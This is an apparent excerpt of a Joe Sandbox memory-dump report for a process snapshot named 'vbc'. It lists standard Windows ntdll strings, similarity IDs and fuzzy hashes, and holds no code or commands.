                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 05904899
                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05904888
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-3154609507
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                    • API String ID: 0-1373925480
                                                                                    Strings
                                                                                    • LdrpInitializationFailure, xrefs: 059020FA
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 05902104
                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 059020F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2986994758
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: #%u
                                                                                    • API String ID: 48624451-232158463
                                                                                    APIs
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0590CFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8
                                                                                    • String ID: @
                                                                                    • API String ID: 4062629308-2766056989
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `$`
                                                                                    • API String ID: 0-197956300
                                                                                    Strings
                                                                                    • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05923011
                                                                                    • , xrefs: 059232B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                    • API String ID: 0-4088147954
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Legacy$UEFI
                                                                                    • API String ID: 2994545307-634100481
                                                                                    Strings
                                                                                    • LdrpResGetMappingSize Exit, xrefs: 0588AC7C
                                                                                    • LdrpResGetMappingSize Enter, xrefs: 0588AC6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                    • API String ID: 0-1497657909
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$MUI
                                                                                    • API String ID: 0-17815947
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    Strings
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0588063D
                                                                                    • kLsE, xrefs: 05880540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 0-2547482624
                                                                                    Strings
                                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 058F2807
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 058F280C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                    • API String ID: 0-2104531740
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0588A2FB
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0588A309
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    Strings
                                                                                    • @, xrefs: 058C1050
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 058C1025
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                    • API String ID: 0-2976085014
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PATH
                                                                                    • API String ID: 0-1036084923
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: w
                                                                                    • API String ID: 0-476252946
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: TrustedInstaller
                                                                                    • API String ID: 0-565535830
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    Strings
                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0591AF2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                    • API String ID: 0-1911121157
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: WindowsExcludedProcs
                                                                                    • API String ID: 0-3583428290
                                                                                    Strings
                                                                                    • Critical error detected %lx, xrefs: 05937027
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Critical error detected %lx
                                                                                    • API String ID: 0-802127002
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction ID: 18f7f4c16805cf38e90a4d3ac03b7b9197dd7571b162f899dbdf19a698fccc06
                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction Fuzzy Hash: F4B15C74B00608AFDF24DB99C944EABB7BAFF84344F145869E942EB7D0DA34E945CB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction ID: e77964ead19e9d7849b5b7cdc4203a4db4ac2ff33c61461900893301a5733d0c
                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction Fuzzy Hash: E5B1E231704649EFDF19CBA8C858BBEB7B6AF85304F184154E956D7291DB30ED41CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1c7fdb4b1fbbac043931a2ad5fc30c605be7765584fcbebb9c64f7b12c0b41d
                                                                                    • Instruction ID: ad142c533a408a6214c01300f20367740e9685ce67c41708da357cca32d8c723
                                                                                    • Opcode Fuzzy Hash: d1c7fdb4b1fbbac043931a2ad5fc30c605be7765584fcbebb9c64f7b12c0b41d
                                                                                    • Instruction Fuzzy Hash: 02C14E71E04349DFEB18CF98C888AADBBB6FF49704F14412AE905EB245DB71AD41CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aec80ab534035c04964afdbf59d5fa70e6bec05ec1cd857c2c482c96412cc620
                                                                                    • Instruction ID: 5c06a095e256f3bbf25ec168fc0d8c98c6ec8607a423ba005823a2b7290df0df
                                                                                    • Opcode Fuzzy Hash: aec80ab534035c04964afdbf59d5fa70e6bec05ec1cd857c2c482c96412cc620
                                                                                    • Instruction Fuzzy Hash: 4DC124752083418FD764DF19C498BAAB7E5FF88304F44496DE98ADB290E774E908CF92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                                                    • Instruction ID: 0d809a78e0061ab5f1ee7e24e866b8448e1dc7535e253175a6a293d09efbdf9d
                                                                                    • Opcode Fuzzy Hash: 709c8af7a8c887759c418f090a5765a5c8b26fb4dfebb4c2aa33400e8b41df22
                                                                                    • Instruction Fuzzy Hash: 70B15F70B042598BDB24DF58C894BA9B3F6BF44704F1485E9D80AEB250EB71DD85CB25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                                                    • Instruction ID: df12108bb9cca385aadb9dff0f2c63bfce92ffae2e8c97025cffff0c2cd10633
                                                                                    • Opcode Fuzzy Hash: ec643b313a67aa30f073921b57483aa966a4ec318d974ca36980a331fbfaae56
                                                                                    • Instruction Fuzzy Hash: 56A11432E046189FEB21DB58C848FAEBBBABB45714F150965EE01EB2D0DB749D40CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                                                    • Instruction ID: ba6f3d25eac641a77e5b3ac82c1f3c44c1ddfd51f9a72f10652945c9ddc1bb63
                                                                                    • Opcode Fuzzy Hash: 2be224c7c6dab85e870cbe285e1ccf1f97cd5e86ed8ec013b3ddcfcaae9f3790
                                                                                    • Instruction Fuzzy Hash: B8A18E70B00619DBDB24DA69C994BBEBBA6FF44359F0040ADEE46D7281DB34EC11CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                                                    • Instruction ID: 61083b6807980712fb91cd539e4497e9e98ce6b1370f68d1591c74b6888f7b7b
                                                                                    • Opcode Fuzzy Hash: ccef32c50b4efcb82f4a28e6f3d8840121a50e732a14cb5dd694d06b06e581de
                                                                                    • Instruction Fuzzy Hash: 7BA1DF72604701AFCB55DF28C980B6ABBE9FF48714F440929F989DB250C734ED91CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f4c50fe2466e028556f6435862e644288c0d711bf2e3cb2ef6274ba9444d6f32
                                                                                    • Instruction ID: bb8accb4b2b6d4f308ca4c6d39b59be96a708fcec1fc9aa740ba0c59c2ff2b86
                                                                                    • Opcode Fuzzy Hash: f4c50fe2466e028556f6435862e644288c0d711bf2e3cb2ef6274ba9444d6f32
                                                                                    • Instruction Fuzzy Hash: 4991B171E04219AFDF15CF68C884BBEBBB9EF48700F154969E900EB280D734ED108BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dfe2c7f6b4cb9b20ea269626f80bc38dbc54940e725f6eb8971c447590bb1c7a
                                                                                    • Instruction ID: 4d40dea089ee02e4f0a6775cb918e75804f7f60ec85c94d466e7b8a2b46ad788
                                                                                    • Opcode Fuzzy Hash: dfe2c7f6b4cb9b20ea269626f80bc38dbc54940e725f6eb8971c447590bb1c7a
                                                                                    • Instruction Fuzzy Hash: CE91E271B04A19DBDB28EB68C844BBABBB6FF85714F094065EC06DB290EA74DD01C791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c90595a46e5a98c6fc276b2ddf1c445697a7c63800cb331f8145e324145f2a44
                                                                                    • Instruction ID: 0fda1e7cced37c4753d466e44753a2ce4053390202d95d7cb303ffdb431c23ec
                                                                                    • Opcode Fuzzy Hash: c90595a46e5a98c6fc276b2ddf1c445697a7c63800cb331f8145e324145f2a44
                                                                                    • Instruction Fuzzy Hash: 23718D7560874AABDB20CF25C980F7AF7E9FB48254F04492AED56D7200E730ED44CBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de0caba1e346c4ee21bb93c0e716b68c4c418ed0a9758735d2fe98e358dbb202
                                                                                    • Instruction ID: 06bc51cd52d99cd144c8a3891c9e67377170581374a714b14ef97a980807b2b1
                                                                                    • Opcode Fuzzy Hash: de0caba1e346c4ee21bb93c0e716b68c4c418ed0a9758735d2fe98e358dbb202
                                                                                    • Instruction Fuzzy Hash: 12814E71A04609AFEB25CFA9C880BEEB7BAFF88354F104529E956E7350D770AC45CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
